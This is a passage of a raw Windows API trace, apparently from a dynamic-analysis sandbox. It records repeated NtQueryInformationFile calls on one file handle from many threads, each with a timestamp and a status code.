NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffc70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffc70, FileInformation=0x44d8098) returned 0x0 Thread: id = 728 os_tid = 0x9f8 [0152.622] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fbf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fbf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 729 os_tid = 0x798 [0152.624] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f840, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f840, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 730 os_tid = 0xa3c [0152.627] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492fc68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492fc68, FileInformation=0x44d8098) returned 0x0 Thread: id = 731 os_tid = 0x8c0 [0152.629] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ef8e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ef8e8, FileInformation=0x44d8098) returned 0x0 Thread: id = 732 os_tid = 0x708 [0152.630] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfee0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfee0, FileInformation=0x44d8098) returned 0x0 Thread: id = 733 os_tid = 0xa64 [0152.632] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492fe78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492fe78, FileInformation=0x44d8098) returned 0x0 Thread: id = 734 os_tid = 0xa30 [0152.634] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480f958, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480f958, FileInformation=0x44d8098) returned 0x0 Thread: id = 735 os_tid = 0x388 [0152.636] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fcd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fcd0, FileInformation=0x44d8098) returned 0x0 Thread: id = 736 os_tid = 0x760 [0152.637] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fd18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fd18, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 737 os_tid = 0xa54 [0152.639] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffa10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffa10, FileInformation=0x44d8098) returned 0x0 Thread: id = 738 os_tid = 0x738 [0152.642] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494fb70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494fb70, FileInformation=0x44d8098) returned 0x0 Thread: id = 739 os_tid = 0x488 [0152.645] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489ff50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489ff50, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 740 os_tid = 0x6dc [0152.647] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fca0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fca0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 741 os_tid = 0x7a0 [0152.649] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfb58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfb58, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 742 os_tid = 0x73c [0152.650] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fd60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fd60, FileInformation=0x44d8098) returned 0x0 Thread: id = 743 os_tid = 0x1c0 [0152.652] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fdc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fdc8, FileInformation=0x44d8098) returned 0x0 Thread: id = 744 os_tid = 0x7c4 [0152.653] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df8d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df8d0, FileInformation=0x44d8098) returned 0x0 Thread: id = 745 os_tid = 0x790 [0152.655] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fc70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480fc70, FileInformation=0x44d8098) returned 0x0 Thread: id = 746 os_tid = 0x688 [0152.657] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f990, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f990, FileInformation=0x44d8098) returned 0x0 Thread: id = 747 os_tid = 0x240 [0152.658] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f8e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f8e8, FileInformation=0x44d8098) returned 0x0 Thread: id = 748 os_tid = 0x8e0 [0152.661] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cff68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cff68, FileInformation=0x44d8098) returned 0x0 Thread: id = 749 os_tid = 0x880 [0152.664] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x433f8f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x433f8f0, FileInformation=0x44d8098) returned 0x0 Thread: id = 750 os_tid = 0x8f0 [0152.665] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fce8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fce8, FileInformation=0x44d8098) returned 0x0 Thread: id = 751 os_tid = 0xa18 [0152.667] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef818, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef818, FileInformation=0x44d8098) returned 0x0 Thread: id = 752 os_tid = 0x8a0 [0152.668] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47afc80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47afc80, FileInformation=0x44d8098) returned 0x0 Thread: id = 753 os_tid = 0x870 [0152.670] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fe00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fe00, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 754 os_tid = 0x9a0 [0152.672] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fea0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fea0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 755 os_tid = 0x2c4 [0152.673] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478fa20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478fa20, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 756 os_tid = 0x890 [0152.675] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fc40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fc40, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 757 os_tid = 0x4e8 [0152.677] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fe90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fe90, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 758 os_tid = 0xcc [0152.680] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fb00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480fb00, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 759 os_tid = 0xd0 [0152.682] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf9c8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf9c8, FileInformation=0x44d8098) returned 0x0 Thread: id = 760 os_tid = 0xd4 [0152.683] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efee0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efee0, FileInformation=0x44d8098) returned 0x0 Thread: id = 761 os_tid = 0xd8 [0152.685] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fee0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fee0, FileInformation=0x44d8098) returned 0x0 Thread: id = 762 os_tid = 0xdc [0152.686] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efd70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efd70, FileInformation=0x44d8098) returned 0x0 Thread: id = 763 os_tid = 0xe0 [0152.688] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efe68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efe68, FileInformation=0x44d8098) returned 0x0 Thread: id = 764 os_tid = 0xe4 [0152.690] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fb70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fb70, FileInformation=0x44d8098) returned 0x0 Thread: id = 765 os_tid = 0xe8 [0152.691] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fe78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fe78, FileInformation=0x44d8098) returned 0x0 Thread: id = 766 os_tid = 0xec [0152.693] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fcd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fcd8, FileInformation=0x44d8098) returned 0x0 Thread: id = 767 os_tid = 0x748 [0152.695] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f860, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f860, FileInformation=0x44d8098) returned 0x0 Thread: id = 768 os_tid = 0xc4 [0152.698] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fcf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fcf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 769 os_tid = 0x620 [0152.700] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fb90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fb90, FileInformation=0x44d8098) returned 0x0 Thread: id = 770 os_tid = 0x910 [0152.702] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f870, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f870, FileInformation=0x44d8098) returned 0x0 Thread: id = 771 os_tid = 0x950 [0152.705] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fbf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fbf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 772 os_tid = 0x940 [0152.706] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efbc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efbc0, FileInformation=0x44d8098) returned 0x0 Thread: id = 773 os_tid = 0x980 [0152.708] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfe38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfe38, FileInformation=0x44d8098) returned 0x0 Thread: id = 774 os_tid = 0xa10 [0152.710] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f798, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f798, FileInformation=0x44d8098) returned 0x0 Thread: id = 775 os_tid = 0x72c [0152.711] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfc00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfc00, FileInformation=0x44d8098) returned 0x0 Thread: id = 776 os_tid = 0x9e0 [0152.713] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfe70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfe70, FileInformation=0x44d8098) returned 0x0 Thread: id = 777 os_tid = 0x9c4 [0152.715] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f798, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f798, FileInformation=0x44d8098) returned 0x0 Thread: id = 778 os_tid = 0xa6c [0152.716] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492f798, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492f798, FileInformation=0x44d8098) returned 0x0 Thread: id = 779 os_tid = 0xb00 [0152.718] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f970, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f970, FileInformation=0x44d8098) returned 0x0 Thread: id = 780 os_tid = 0xaf8 [0152.720] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fc68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fc68, FileInformation=0x44d8098) returned 0x0 Thread: id = 781 os_tid = 0xae4 [0152.721] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffb38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffb38, FileInformation=0x44d8098) returned 0x0 Thread: id = 782 os_tid = 0x344 [0152.723] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fb78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fb78, FileInformation=0x44d8098) returned 0x0 Thread: id = 783 os_tid = 0x808 [0152.725] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffb38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffb38, FileInformation=0x44d8098) returned 0x0 Thread: id = 784 os_tid = 0x858 [0152.726] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afa08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afa08, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 785 os_tid = 0x224 [0152.728] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffd78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffd78, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 786 os_tid = 0x4dc [0152.730] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fb40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480fb40, FileInformation=0x44d8098) returned 0x0 Thread: id = 787 os_tid = 0x78c [0152.731] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cfe20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cfe20, FileInformation=0x44d8098) returned 0x0 Thread: id = 788 os_tid = 0xb0 [0152.735] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bf9e0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bf9e0, FileInformation=0x44d8098) returned 0x0 Thread: id = 789 os_tid = 0x314 [0152.736] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f9d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f9d8, FileInformation=0x44d8098) returned 0x0 Thread: id = 790 os_tid = 0x804 [0152.738] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff970, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff970, FileInformation=0x44d8098) returned 0x0 Thread: id = 791 os_tid = 0x854 [0152.740] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfdc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfdc8, FileInformation=0x44d8098) returned 0x0 Thread: id = 792 os_tid = 0xa78 [0152.741] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f8a0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f8a0, FileInformation=0x44d8098) returned 0x0 Thread: id = 793 os_tid = 0x6a8 [0152.743] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fa60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fa60, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 794 os_tid = 0x7a8 [0152.745] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fc80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fc80, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 795 os_tid = 0x330 [0152.748] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff900, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff900, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 796 os_tid = 0x3a4 [0152.749] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fbb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fbb0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 797 os_tid = 0x67c [0152.751] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fac0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fac0, FileInformation=0x44d8098) returned 0x0 Thread: id = 798 os_tid = 0x5cc [0152.753] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff848, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff848, FileInformation=0x44d8098) returned 0x0 Thread: id = 799 os_tid = 0x840 [0152.755] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fc88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fc88, FileInformation=0x44d8098) returned 0x0 Thread: id = 800 os_tid = 0x69c [0152.757] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff830, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff830, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 801 os_tid = 0x6f0 [0152.758] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dff80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dff80, FileInformation=0x44d8098) returned 0x0 Thread: id = 802 os_tid = 0x810 [0152.760] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480f998, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480f998, FileInformation=0x44d8098) returned 0x0 Thread: id = 803 os_tid = 0xa88 [0152.762] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484f850, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484f850, FileInformation=0x44d8098) returned 0x0 Thread: id = 804 os_tid = 0x43c [0152.763] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfdc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfdc0, FileInformation=0x44d8098) returned 0x0 Thread: id = 805 os_tid = 0x670 [0152.766] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486f840, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486f840, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 806 os_tid = 0xa14 [0152.768] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490fda0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490fda0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 807 os_tid = 0x990 [0152.771] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf978, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf978, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 808 os_tid = 0x2dc [0152.773] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432ff18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432ff18, FileInformation=0x44d8098) returned 0x0 Thread: id = 809 os_tid = 0x74c [0152.775] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47afab8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47afab8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 810 os_tid = 0x3c4 [0152.776] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efcf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efcf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 811 os_tid = 0x90 [0152.778] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fbd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fbd0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 812 os_tid = 0x630 [0152.779] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ef7b0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ef7b0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 813 os_tid = 0x124 [0152.781] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffd70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffd70, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 814 os_tid = 0xc0 [0152.782] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fb18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fb18, FileInformation=0x44d8098) returned 0x0 Thread: id = 815 os_tid = 0x360 [0152.784] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434ff10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434ff10, FileInformation=0x44d8098) returned 0x0 Thread: id = 816 os_tid = 0x920 [0152.787] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fc10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fc10, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 817 os_tid = 0xbec [0152.789] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fa80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fa80, FileInformation=0x44d8098) returned 0x0 Thread: id = 818 os_tid = 0x6b8 [0152.791] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492fc80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492fc80, FileInformation=0x44d8098) returned 0x0 Thread: id = 819 os_tid = 0x30c [0152.793] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490f848, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490f848, FileInformation=0x44d8098) returned 0x0 Thread: id = 820 os_tid = 0xbfc [0152.795] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fdc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fdc8, FileInformation=0x44d8098) returned 0x0 Thread: id = 821 os_tid = 0x3f8 [0152.797] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efcb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efcb0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 822 os_tid = 0x6cc [0152.798] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f9e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f9e8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 823 os_tid = 0x830 [0152.800] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492ff68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492ff68, FileInformation=0x44d8098) returned 0x0 Thread: id = 824 os_tid = 0x75c [0152.802] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483faa0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483faa0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 825 os_tid = 0x7f0 [0152.805] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cf970, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cf970, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 826 os_tid = 0x710 [0152.807] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fe08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fe08, FileInformation=0x44d8098) returned 0x0 Thread: id = 827 os_tid = 0x5d8 [0152.809] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fea0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fea0, FileInformation=0x44d8098) returned 0x0 Thread: id = 828 os_tid = 0xbe4 [0152.811] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476f968, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476f968, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 829 os_tid = 0x600 [0152.816] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fb28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fb28, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 830 os_tid = 0xbd0 [0152.817] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fb90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fb90, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 831 os_tid = 0x158 [0152.818] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f8a0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f8a0, FileInformation=0x44d8098) returned 0xc00000bb Thread: id = 832 os_tid = 0xbd8 [0152.820] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fd08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fd08, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 833 os_tid = 0xbe8 [0152.822] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fa80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fa80, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 834 os_tid = 0xbdc [0152.823] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f9d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f9d0, FileInformation=0x44d8098) returned 0x0 Thread: id = 835 os_tid = 0x5b4 [0152.826] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fc08, FileInformation=0x44d8098, Length=0x10000, 